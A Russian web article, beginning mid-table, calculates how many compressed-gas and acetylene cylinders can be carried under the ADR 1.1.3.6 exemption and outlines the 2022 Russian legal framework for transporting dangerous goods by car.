Углекислота24кг/40л баллонндо 41 штук включительно
Углекислота19кг/40л баллонндо 52 штук включительно

Таким образом расчет очень прост ( класс 2 группа А- допустимо 1000л. Соответственно 1000л/на 40л баллон =25 баллонов, Однако среднестатистическая вместимость баллона при выборке не менее 100 реальных баллонов составляет 40,7-41 литра то 24 баллона соответственно можем перевозить с кислородом.

Зная, сколько литров в баллоне мы рассчитаем разные баллоны по весу и смело перевозим без свидетельства ДОПОГ.

Наиболее сложная ситуация с ацетиленом. По формальным признакам (газ горючий, растворенный, 5 кг на 40л баллон) следует считать Группа F-333л /5 = 66 баллонов на транспортной единице. Однако, принимая во внимание, что в баллоне одновременно находится 13,2 кг столь же горючего ацетона, в котором, собственно, и растворен ацетилен, видимо, следует принять максимальное количество равное 333/(5 13,2) = 18

Наконец, в соответствии с 1.1.3.6.4 ДОПОГ «Если в одной и той же транспортной единице перевозятся опасные грузы, относящиеся к разным транспортным категориям, сумма … количества веществ и изделий транспортной категории «2», помноженного на 3, и количества веществ и зделий транспортной категории «3» не должна превышать 1000″.

Пример: можно ли перевозить совместно 4 баллона пропана и 8 баллонов кислорода?

Источник

Разрешается ли перевозка опасных грузов в 2022 году?

Да. Однако, нужно разделять коммерческую и/или крупнопартийную перевозку в больших тарах, цистернах и других объёмных ёмкостях от обычного передвижения на легковом автомобиле, в багажнике которого лежит что-то, что представляет опасность.

Итак, первое, куда заглядывает практически любой водитель при возникновении вопроса по езде по дорогам, в том числе чтобы выяснить, можно ли перевозить опасные грузы на авто – это ПДД. И ответ здесь, действительно, есть, хотя он нас и не удовлетворит. Давайте рассмотрим цепочку законодательных актов, которые приведут нас к ответу.

  1. Пункт 23.5 ПДД указывает, что перевозка опасных грузов должна осуществляться в соответствии с законом Об автомобильных дорогах и дорожной деятельности.
  2. Ок, идём в этот нормативно-правовой акт и видим в пункте 1.1 статьи 31, что движение с опасными веществами в России должно производиться в соответствии со специальным Европейским соглашением, называемым также ДОПОГ. Причём, для возможности этого требуется получать разрешение.
  3. Ниже по этому пункту можем увидеть, что исключение составляет лишь военная техника, самоходные машины с вооружением и другие транспортные средства, относящиеся к вооружённым силам.
  4. Остаётся только уповать на ДОПОГ. Хотя, заглянув в этот правовой акт, мы можем узнать, что там целых 739 страниц, регулирующих правила перевозки опасных грузов.

Но всё же есть в 2022 году возможность возить бензин, дизельное топливо, спирт и прочие опасные вещества без штрафа. Однако, это требует рассмотрения каждого отдельного такого груза и соответствующих требований к нему. А пока выясним размер санкции за подобные нарушения.

Кстати, на большинстве интернет-сайтов вы сможете увидеть информацию о регулировании нашего с вами вопроса разного рода Постановлениями Правительства РФ или Приказами. Однако, данная информация по состоянию на 2022 год устарела и потому не является правдой.

https://www.youtube.com/watch?v=Xmi1MWM8djI

Сегодня взамен всех нормативных актов по опасным грузам введён один единственный – ППРФ №2200, который вообще никак не регулирует возможность перевозки для личных нужд и физическими лицами.

Оцените статью
Кислород
Добавить комментарий